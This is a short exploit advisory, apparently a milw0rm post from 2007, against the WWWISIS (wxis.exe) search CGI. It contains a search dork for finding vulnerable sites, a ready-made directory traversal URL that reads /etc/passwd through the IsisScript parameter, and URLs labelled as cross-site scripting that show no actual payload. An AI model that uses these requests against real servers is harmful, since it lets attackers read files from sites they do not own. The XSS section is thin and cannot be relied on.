# WWWISIS (Search) Multiple Vulnerabilities # Download: # http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 # Bug found by JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # d0rk: powered by WWWISIS #Stop lammer # Local File Disclosure Vulnerability: http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd # Exploit In (XSS): http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e .... [ i,e ... ] it is the language of script # Cross Siting Scripting: //---------------------------------------\\ Greetz To: All Hackers JosS! # milw0rm.com [2007-10-13]